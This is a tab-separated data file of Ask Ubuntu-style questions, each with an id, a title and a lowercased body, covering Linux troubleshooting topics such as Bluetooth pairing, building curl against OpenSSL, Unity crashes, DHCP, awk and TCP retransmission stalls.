475666	embedded ubuntu 's bluetooth discoverable by android but not ios	i have a system running ubuntu . the bluetooth device ( hci0 ) is powered , discoverable , pairable , and scanning ( discovering ) . it can discover all devices in the area , android and ios . multiple android devices can discover and pair to it . however , no ios devices ( ipods and iphones from multiple generations ) can find the ubuntu 's bluetooth . i have tried to search for this , but all the solutions say `` restart your ipod . '' i 've done that many times , i have restarted the ubuntu system , powered on/off the bluetooth , toggled its discoverable and discovering modes , etc . are there any known issues for this ? is there a setting in the ios that wo n't allow it to see certain devices ? the ios devices can see my ubuntu laptop , running the same version of bluez ( 5.0 ) .
475670	how to build curl with the latest openssl ?	so i build openssl ./config make sudo make install sudo ln -sf /usr/local/ssl/bin/openssl `which openssl` i build curl ./configure -- with-ssl make make install openssl looks installed correctly : openssl version openssl 1.0.1g 7 apr 2014 however curl uses old openssl version ( 1.0.1f instead of 1.0.1g ) : curl -- version curl 7.37.0 ( x86_64-unknown-linux-gnu ) libcurl/7.37.0 openssl/1.0.1f zlib/1.2.8 libidn/1.28 libssh2/1.4.3 librtmp/2.3 protocols : dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtmp rtsp scp sftp smtp smtps telnet tftp features : idn ipv6 largefile ntlm ntlm_wb ssl libz tls-srp how to make curl use new version ? i want to try the newest versions , because i am fighting with some strange openssl/curl bug # 1 # 2 edit : i also tried ./configure -- with-ssl=/usr/local/ssl/include/openssl , no success edit2 : so far i also tried : sudo ./configure -- with-ssl -- with-libssl-prefix=/usr/local/ssl ./configure -- with-ssl=/usr/local/ssl pkg_config_path=/usr/local/ssl/lib/pkgconfig ./configure pkg_config_path=/usr/local/ssl/lib/pkgconfig ./configure -- with-ssl pkg_config_path=/usr/local/ssl/lib/pkgconfig ./configure -- with-ssl=/usr/local/ssl/include/openssl no success ...
475673	linux alternative for windows 8	is there any linux alternative for windows 8 or windows 8.1 operating system ? i want to know if there is a linux disto which looks exactly as win 8 .
475676	hdd spindown on 14.04lts	i ca n't get my drives ( seagate 750mb , western digital 1tb & western digital 500gb ) to spindown on 14.04lts . i have added the following lines on hdparm.conf which worked fine on 12.04lts command_line { hdparm -s 240 /dev/sdb } command_line { hdparm -s 240 /dev/sdc } command_line { hdparm -s 240 /dev/sdd }
475679	xubuntu panel disappears every time i restart ( solved )	well , i recently installed xubuntu 14.04 and every time i restart , the top panel disappears . as a solution i found the following commands to make the panel reappears , but i have to run it in terminal every time i reboot : xfce4-panel -- quit pkill xfconfd rm -rf ~/.config/xfce4/panel rm -rf ~/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-panel.xml xfce4-panel is there any way to make this happen every time i reboot ? the other options here did n't work to me . if i run after restart only xfce4-panel it says : xfce4-panel : there is already and instance running
475680	compare package list between servers	i know on desktop there 's a graphical way to sync package list between pc . on servers i 've always been doing dpkg -- get-selection > pkg_list scp pkg_list username @ server : dpkg -- set-selction < pkg_list apt-get update & & apt-get upgrade unfortunately this looks deprecated : i 'm not anymore able to do that . is there any other way ? ( and without involving external tools like ansible , salt , puppet ) n.b . i do n't want to sync configuration files or directory , just packages . edit : added apt-get command to update/upgrade
475682	chrome 35 stopped touch interaction after chrome update on ubuntu 14.04	after updating chrome to version google chrome 35.0.1916.114 on ubuntu 14.04 , chrome does not respond to touch events anymore at a first start . chrome is invoked at start up via a script by calling google-chrome http : //127.0.0.1/ touch events worked fine with google chrome 34 , but are broken after the update . it is not just a html or css issue , as i can move the then invisible mouse cursor on chrome system buttons as the refresh button or the url bar and no click event takes place , but according hints are shown . if i close chrome and restart it again , touch events will work fine , as well as on system buttons like refresh as on html pages . maybe that is not a chrome issue , as i ran a system update via the packet manager . but chromium-browser remained at version 34 and still accepts touch events , so it is rather a chrome 35 issue . setting the -- touch-events=enabled flag , as suggested in chrome + touchscreen + unity ( 14.04 ) or ubuntu 14.04 multi touch screen support , does not work . i also tried : starting chrome 35 automatically by startup script killing the chrome process after 5 seconds by the same start up script restarting the chrome process again in that start up script in order to activate touch interaction , as it works after closing and starting chrome manually . that automatic approach does not work either . can someone confirm that behavior of chrome ? is there a solution on activating touch events in chrome again ? annotation : the ubuntu task bar accepts touch events . i can start applications via icon touch without problems . update : chrome will respond to touch events , if the touch screen was touched before start of chrome . for instance , a single touch onto the empty desktop will do while the start up script sleeps for some seconds , starting chrome automatically afterwards . but a simple emulated mouse click by xdotool wo n't help .
475683	unity not working 14.04	i am using ubuntu 14.04 lts x64 . i did a sudo apt-get upgrade yesterday and restarted my pc . now my taskbar and panel are missing . when i try to restart unity using unity -- replace then i get error : unity-panel-service stop/waiting compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service start/running , process 3906 compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : starting plugin : opengl libgl error : dlopen /usr/lib/x86_64-linux-gnu/dri/i965_dri.so failed ( /usr/lib/x86_64-linux-gnu/dri/i965_dri.so : undefined symbol : _glapi_tls_dispatch ) libgl error : dlopen $ { origin } /dri/i965_dri.so failed ( $ { origin } /dri/i965_dri.so : can not open shared object file : no such file or directory ) libgl error : dlopen /usr/lib/dri/i965_dri.so failed ( /usr/lib/dri/i965_dri.so : can not open shared object file : no such file or directory ) libgl error : unable to load driver : i965_dri.so libgl error : driver pointer missing libgl error : failed to load driver : i965 libgl error : dlopen /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so failed ( /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so : undefined symbol : _glapi_tls_dispatch ) libgl error : dlopen $ { origin } /dri/swrast_dri.so failed ( $ { origin } /dri/swrast_dri.so : can not open shared object file : no such file or directory ) libgl error : dlopen /usr/lib/dri/swrast_dri.so failed ( /usr/lib/dri/swrast_dri.so : can not open shared object file : no such file or directory ) libgl error : unable to load driver : swrast_dri.so libgl error : failed to load driver : swrast compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session i/o warning : failed to load external entity `` /home/sumeet/.compiz/session/10de541a813cc1a8fc140170575114755000000020350005 '' compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - info : loading plugin : animation compiz ( core ) - info : starting plugin : animation compiz ( core ) - info : loading plugin : fade compiz ( core ) - info : starting plugin : fade compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - info : loading plugin : unityshell compiz ( core ) - info : starting plugin : unityshell warn 2014-06-02 18:46:23 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.shell ' yet as we do n't have a connection , waiting for it ... error 2014-06-02 18:46:23 unity.debug.interface debugdbusinterface.cpp:216 unable to load entry point in libxpathselect : libxpathselect.so.1.4 : can not open shared object file : no such file or directory compiz ( unityshell ) - error : gl_arb_vertex_buffer_object not supported error 2014-06-02 18:46:23 unity.shell.compiz unityshell.cpp:3850 impossible to delete the unity locked stamp file compiz ( core ) - error : plugin initscreen failed : unityshell compiz ( core ) - error : failed to start plugin : unityshell compiz ( core ) - info : unloading plugin : unityshell x error of failed request : badwindow ( invalid window parameter ) major opcode of failed request : 3 ( x_getwindowattributes ) resource id in failed request : 0x3e000c9 serial number of failed request : 10115 current serial number in output stream : 10116 any help would be highly appreciated . edit : my pc configuration description : portable computer product : dell system xps l502x ( system skunumber ) vendor : dell inc. version : 0.1 serial : 1006zp1 width : 64 bits capabilities : smbios-2.6 dmi-2.6 vsyscall32 configuration : administrator_password=unknown boot=normal chassis=portable family=huronriver system frontpanel_password=unknown keyboard_password=unknown power-on_password=unknown sku=system skunumber uuid=44454c4c-3000-1030-8036-b1c04f5a5031 *-core description : motherboard product : 0yr8nn vendor : dell inc. physical id : 0 version : a00 serial : .1006zp1.cn4864314c0560 . slot : part component *-firmware description : bios vendor : dell inc. physical id : 0 version : a11 date : 05/29/2012 size : 128kib capacity : 2496kib capabilities : pci pnp upgrade shadowing escd cdboot bootselect socketedrom edd int13floppy360 int13floppy1200 int13floppy720 int5printscreen int9keyboard int14serial int17printer int10video acpi usb ls120boot smartbattery biosbootspecification netboot *-cpu description : cpu product : intel ( r ) core ( tm ) i7-2630qm cpu @ 2.00ghz vendor : intel corp. physical id : 19 bus info : cpu @ 0 version : intel ( r ) core ( tm ) i7-2630qm cpu @ 2.00ghz serial : not supported by cpu slot : cpu size : 800mhz capacity : 800mhz width : 64 bits clock : 100mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp constant_tsc arch_perfmon pebs bts nopl xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid cpufreq configuration : cores=4 enabledcores=4 threads=8 *-cache:0 description : l1 cache physical id : 1a slot : l1-cache size : 64kib capacity : 64kib capabilities : synchronous internal write-through data *-cache:1 description : l2 cache physical id : 1b slot : l2-cache size : 256kib capacity : 256kib capabilities : synchronous internal write-through data *-cache:2 description : l3 cache physical id : 1c slot : l3-cache size : 6mib capacity : 6mib capabilities : synchronous internal write-back unified *-memory description : system memory physical id : 1d slot : system board or motherboard size : 6gib *-bank:0 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : m471b5273dh0-ch9 vendor : samsung physical id : 0 serial : 450f1160 slot : channela-dimm0 size : 4gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:1 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : hmt325s6bfr8c-h9 vendor : hynix/hyundai physical id : 1 serial : 0ca0e8e2 slot : channelb-dimm0 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-pci description : host bridge product : 2nd generation core processor family dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 09 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : xeon e3-1200/2nd generation core processor family pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 09 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport:3000 ( size=4096 ) memory : f0000000-f10fffff ioport : c0000000 ( size=301989888 ) *-generic unclaimed description : unassigned class product : illegal vendor id vendor : illegal vendor id physical id : 0 bus info : pci @ 0000:01:00.0 version : ff width : 32 bits clock : 66mhz capabilities : bus_master vga_palette cap_list configuration : latency=255 maxlatency=255 mingnt=255 resources : memory : f0000000-f0ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport:3000 ( size=128 ) memory : f1000000-f107ffff *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:52 memory : f1400000-f17fffff memory : e0000000-efffffff ioport:4000 ( size=64 ) *-communication description : communication controller product : 6 series/c200 series chipset family mei controller # 1 vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=mei_me latency=0 resources : irq:50 memory : f1c05000-f1c0500f *-usb:0 description : usb controller product : 6 series/c200 series chipset family usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:16 memory : f1c09000-f1c093ff *-multimedia description : audio device product : 6 series/c200 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 05 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:53 memory : f1c00000-f1c03fff *-pci:1 description : pci bridge product : 6 series/c200 series chipset family pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode cap_list configuration : driver=pcieport resources : irq:16 *-pci:2 description : pci bridge product : 6 series/c200 series chipset family pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:17 memory : f1b00000-f1bfffff *-network description : wireless interface product : centrino wireless-n 1030 [ rainbow peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : mon.wlan0 version : 34 serial : bc:77:37:14:47 : e5 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list logical wireless ethernet physical configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-27-generic firmware=18.168.6.1 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:51 memory : f1b00000-f1b01fff *-pci:3 description : pci bridge product : 6 series/c200 series chipset family pci express root port 4 vendor : intel corporation physical id : 1c.3 bus info : pci @ 0000:00:1c.3 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:19 memory : f1a00000-f1afffff *-usb description : usb controller product : upd720200 usb 3.0 host controller vendor : nec corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:19 memory : f1a00000-f1a01fff *-pci:4 description : pci bridge product : 6 series/c200 series chipset family pci express root port 5 vendor : intel corporation physical id : 1c.4 bus info : pci @ 0000:00:1c.4 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 memory : f1900000-f19fffff *-pci:5 description : pci bridge product : 6 series/c200 series chipset family pci express root port 6 vendor : intel corporation physical id : 1c.5 bus info : pci @ 0000:00:1c.5 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:17 ioport:2000 ( size=4096 ) ioport : f1800000 ( size=1048576 ) *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : 06 serial : 14 : fe : b5 : a3 : ac:40 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-2.fw ip=172.19.167.151 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:49 ioport:2000 ( size=256 ) memory : f1804000-f1804fff memory : f1800000-f1803fff *-usb:1 description : usb controller product : 6 series/c200 series chipset family usb enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:23 memory : f1c08000-f1c083ff *-isa description : isa bridge product : hm67 express chipset family lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 05 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : driver=lpc_ich latency=0 resources : irq:0 *-ide:0 description : ide interface product : 6 series/c200 series chipset family 4 port sata ide controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 05 width : 32 bits clock : 66mhz capabilities : ide pm bus_master cap_list configuration : driver=ata_piix latency=0 resources : irq:19 ioport:40b8 ( size=8 ) ioport:40cc ( size=4 ) ioport:40b0 ( size=8 ) ioport:40c8 ( size=4 ) ioport:4090 ( size=16 ) ioport:4080 ( size=16 ) *-serial unclaimed description : smbus product : 6 series/c200 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 05 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : f1c04000-f1c040ff ioport : efa0 ( size=32 ) *-ide:1 description : ide interface product : 6 series/c200 series chipset family 2 port sata ide controller vendor : intel corporation physical id : 1f.5 bus info : pci @ 0000:00:1f.5 version : 05 width : 32 bits clock : 66mhz capabilities : ide pm bus_master cap_list configuration : driver=ata_piix latency=0 resources : irq:19 ioport:40a8 ( size=8 ) ioport:40c4 ( size=4 ) ioport:40a0 ( size=8 ) ioport:40c0 ( size=4 ) ioport:4070 ( size=16 ) ioport:4060 ( size=16 ) *-scsi:0 physical id : 1 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : samsung hn-m640m physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 2ar1 serial : s2t3j1kbc00006 size : 596gib ( 640gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=6b746d91 *-volume:0 description : windows ntfs volume physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : 3.1 serial : 0272-3e7f size : 348mib capacity : 350mib capabilities : primary bootable ntfs initialized configuration : clustersize=4096 created=2013-09-18 12:20:45 filesystem=ntfs label=system reserved modified_by_chkdsk=true mounted_on_nt4=true resize_log_file=true state=dirty upgrade_on_mount=true *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 116gib capacity : 116gib capabilities : primary extended partitioned partitioned : extended *-logicalvolume:0 description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 6037mib capabilities : nofs *-logicalvolume:1 description : linux filesystem partition physical id : 6 logical name : /dev/sda6 logical name : / capacity : 110gib configuration : mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered state=mounted *-volume:2 description : windows ntfs volume physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 logical name : /media/os version : 3.1 serial : 4e7853ec-5555-a74d-82e0-9f49798d3772 size : 156gib capacity : 156gib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2013-09-19 09:19:00 filesystem=ntfs label=os mount.fstype=fuseblk mount.options=ro , nosuid , nodev , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 state=mounted *-volume:3 description : windows ntfs volume physical id : 4 bus info : scsi @ 0:0.0.0,4 logical name : /dev/sda4 logical name : /media/data version : 3.1 serial : 7666d55f-e1bf-e645-9791-2a1a31b24b9a size : 322gib capacity : 322gib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2013-09-17 23:27:01 filesystem=ntfs label=data modified_by_chkdsk=true mount.fstype=fuseblk mount.options=rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 mounted_on_nt4=true resize_log_file=true state=mounted upgrade_on_mount=true *-scsi:1 physical id : 2 logical name : scsi1 capabilities : emulated *-cdrom description : dvd-ram writer product : dvd+-rw gt32n vendor : hl-dt-st physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : a201 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-battery product : dell vendor : sanyo physical id : 1 version : 2008 serial : 1.0 slot : rear capacity : 57720mwh configuration : voltage=11.1v `
475684	network manager wiping resolv.conf	i have a wired connection that is not managed by network manager due to nm not yet supporting bridge . on the other hand all my wireless connections are managed by network manager . problem is , when i use my wired connection , nm instead of not doing anything , it out my /etc/resolv.conf by putting # generated by networkmanager and nothing more . i suspect this is because there 's no connection and per default nm reset my resolv.conf . how can i tell nm to not overwrite /etc/resolv.conf if there 's no connection ? i know i can chattr -i that file or putting a post-up command in my /etc/network/interfaces but i 'd like a cleaner way rather than a hack or a workaround for this strange behavior of network manager
475685	error while running ruby application at system startup in ubuntu	i am on ubuntu 12.04 machine . have a script file which runs when entered manually in terminal gnome-terminal -e /home/precise/desktop/cartodb/script.sh the content of script file is cd /home/ubuntupc/desktop/cartodb20/ sh /home/ubuntupc/.rvm/scripts/rvm bundle exec foreman start -p 3000 so what i tried to do is to run this script at every system start up . so on startup applications command : gnome-terminal -e /home/precise/desktop/cartodb/script.sh on terminal edit - > profile preferences - > title and command checked the `` run command as a login shell '' but this seems to be not working . when restarted the machine found these error in terminal the child process exited normally with status 127 . error : rvm ruby not used , run `rvm use ruby` first . some info regarding the installed packages and system . $ which ruby /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/bin/ruby $ which rails /home/ubuntupc/.rvm/gems/ruby-1.9.2-p320/bin/rails $ which gem /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/bin/gem $ cat ~/.bash_profile [ [ -s `` $ home/.profile '' ] ] & & source `` $ home/.profile '' # load the default .profile [ [ -s `` $ home/.rvm/scripts/rvm '' ] ] & & source `` $ home/.rvm/scripts/rvm '' # load rvm into a shell session *as a function* $ which -a ruby /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/bin/ruby $ sudo update-alternatives -- config ruby update-alternatives : error : no alternatives for ruby . $ sudo find / -name `` rubygems '' -print /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/lib/ruby/site_ruby/1.9.1/rubygems /home/ubuntupc/.rvm/rubies/ruby-1.9.2-p320/lib/ruby/1.9.1/rubygems /home/ubuntupc/.rvm/src/ruby-1.9.2-p320/lib/rubygems /home/ubuntupc/.rvm/src/ruby-1.9.2-p320/test/rubygems /home/ubuntupc/.rvm/src/ruby-1.9.2-p320/test/rubygems/rubygems /home/ubuntupc/.rvm/src/ruby-1.9.2-p320/doc/rubygems /home/ubuntupc/.rvm/src/rubygems-2.2.1/lib/rubygems /home/ubuntupc/.rvm/src/rubygems-2.2.1/test/rubygems /home/ubuntupc/.rvm/src/rubygems-2.2.1/test/rubygems/rubygems /home/ubuntupc/.rvm/src/rvm/scripts/functions/rubygems /home/ubuntupc/.rvm/src/rvm/scripts/rubygems /home/ubuntupc/.rvm/scripts/functions/rubygems /home/ubuntupc/.rvm/scripts/rubygems /usr/lib/ruby/1.9.1/rubygems /usr/local/rvm/rubies/ruby-1.9.2-p320/lib/ruby/site_ruby/1.9.1/rubygems /usr/local/rvm/rubies/ruby-1.9.2-p320/lib/ruby/1.9.1/rubygems /usr/local/rvm/src/ruby-1.9.2-p320/lib/rubygems /usr/local/rvm/src/ruby-1.9.2-p320/test/rubygems /usr/local/rvm/src/ruby-1.9.2-p320/test/rubygems/rubygems /usr/local/rvm/src/ruby-1.9.2-p320/doc/rubygems /usr/local/rvm/src/rubygems-2.2.0/lib/rubygems /usr/local/rvm/src/rubygems-2.2.0/test/rubygems /usr/local/rvm/src/rubygems-2.2.0/test/rubygems/rubygems /usr/local/rvm/src/rvm/scripts/functions/rubygems /usr/local/rvm/src/rvm/scripts/rubygems /usr/local/rvm/scripts/functions/rubygems /usr/local/rvm/scripts/rubygems please point out what i am missing as i am new to the ruby applications . thanks in advance
475686	setup a no internet session for ubuntu	how can i ask networkmanager applet not to start for a specific session ? i have two sessions , i 'd like one to have internet access and configuration using networkmanager and the second one not to be able to use networkmanager .
475687	any synaptics driver for hp 255 g2 ?	does anyone know how i can rectify the problem of not being able to use my touch pad at all on my hp 255 g2 ? i am currently running ubuntu 14.04 lts and have to use a usb mouse , which is tiresome when i am not at a desk .
475691	install second ubuntu distribution on second drive	i have ubuntu 13.10 already installed on /dev/sda . now i want to install version 14.04 on /dev/sdb ( screenshots from gparted are pasted below ) . how should i proceed ?
475692	how to stop dhcp server	i have installed a dhcp server . now i need to stop the dhcp server , when i issue the command : sudo service isc-dhcp-server stop i get stop : unknown instance . i confirm the dhcp service is running . i have note yet configured it . can you please let me know how to stop the dhcp service in my ubuntu server . here is my interface config file : auto lo iface lo inet loopback auto eth0 iface eth0 inet manual auto br0 iface br0 inet static address 192.168.2.100 netmask 255.255.255.0 network 192.168.2.0 broadcast 192.168.2.255 gateway 192.168.2.1 dns-nameserver 8.8.8.8 bridge_ports eth0 bridge_stp off bridge_fd 0 bridge_hello 2 bridge_maxwait 0
475694	awk command to print all the lines except the last three lines	i want to print all the lines except the last three lines from the input through awk only . please note that my file contains n number of lines . for example , file.txt contains , foo bar foobar barfoo last line i want the output to be , foo bar foobar i know it could be possible through the combination of tac and sed or tac and awk $ tac file | sed '1,3d ' | tac foo bar foobar $ tac file | awk 'nr==1 { next } nr==2 { next } nr==3 { next } 1 ' | tac foo bar foobar but i want the output through awk only .
475697	how can i transfer data between two computers using ethernet cable and ftp software like ( gftp ) ?	i want to transfer data between two linux ubuntu computers using just ethernet cable and ftp software like gftp is this possible ? because i get connection refused when trying to connect
475700	application stuck in tcp retransmit	i am running linux kernel 3.13 ( ubuntu 14.04 ) on two virtual machines each of which operates inside two different servers running esxi 5.1 . there is a zeromq client-server application running between the two vms . after running for about 10-30 minutes , this application consistently hangs due to inability to retransmit a lost packet . when i run the same setup over ubuntu 12.04 ( linux 3.11 ) , the application never fails ( update : also fails on 12.04 but takes longer ) if you notice below , `` ss '' ( socket statistics ) shows 1 packet lost , sk_wmem_queued of 14110 ( i.e . w14110 ) and a high rto ( 120000 ) . state recv-q send-q local address : port peer address : port estab 0 **12350** 192.168.2.122:41808 192.168.2.172:55550 timer : ( on,16sec,10 ) uid:1000 ino:35042 sk : ffff880035bcb100 < - > skmem : ( r0 , rb648720 , t0 , tb1164800 , f2274 , **w14110** , o0 , bl0 ) ts sack cubic wscale:7,7 rto:120000 rtt:7.5/3 ato:40 mss:8948 cwnd:1 ssthresh:21 send 9.5mbps **unacked:1 retrans:1/10 lost:1** rcv_rtt:1476 rcv_space:37621 since this has happened so consistently , i was able to capture the tcp log in wireshark . i found that the packet which is lost does get retransmitted and even acknowledged by the tcp in the other os ( the sequence number is seen in the ack ) , but the sender does n't seem to understand this ack and continues retransmitting . mtu is 9000 on both virtual machines and througout the route . the packets being sent are large in size . as i said earlier , this does not happen on ubuntu 12.04 ( kernel 3.11 ) . so i did a diff on the tcp config options ( seen via `` sysctl -a |grep tcp `` ) between 14.04 and 12.04 and found the following differences . i also noticed that net.ipv4.tcp_mtu_probing=0 in both configurations . left side is 3.11 , right side is 3.13 < < net.ipv4.tcp_abc = 0 < < net.ipv4.tcp_cookie_size = 0 < < net.ipv4.tcp_dma_copybreak = 4096 14c11 < < net.ipv4.tcp_early_retrans = 2 -- - > > net.ipv4.tcp_early_retrans = 3 17c14 < < net.ipv4.tcp_fastopen = 0 > > net.ipv4.tcp_fastopen = 1 20d16 < < net.ipv4.tcp_frto_response = 0 26,27c22 < < net.ipv4.tcp_max_orphans = 16384 < < net.ipv4.tcp_max_ssthresh = 0 > > net.ipv4.tcp_max_orphans = 4096 29,30c24,25 < < net.ipv4.tcp_max_tw_buckets = 16384 < < net.ipv4.tcp_mem = 94377 125837 188754 > > net.ipv4.tcp_max_tw_buckets = 4096 > > net.ipv4.tcp_mem = 23352 31138 46704 34a30 > > net.ipv4.tcp_notsent_lowat = -1 my question to the networking experts on this forum : are there any other debugging tools or options i can install/enable to dig further into why this tcp retransmit failure is occurring so consistently ? are there any configuration changes which might account for this weird behaviour . update ( for those who may hit a similar problem later ) : i was able to reproduce the problem on 3.11 as well and was then able to evade this problem by lowering the mtu . a similar problem has been reported here http : //serverfault.com/questions/488893/how-do-i-prevent-tcp-connection-freezes-over-an-openvpn-network . the description given there matches what i saw : '' at some point with the ubuntu clients , though , the remote end starts retransmitting the same tcp segment over and over ( with the transmit delay increasing between each retransmission ) . the client sends what looks like a valid tcp ack to each retransmission , but the remote end still continues to transmit the same tcp segment periodically . '' maybe related article : https : //blogs.kent.ac.uk/unseenit/2013/10/18/stalled-scp-and-hanging-tcp-connections/
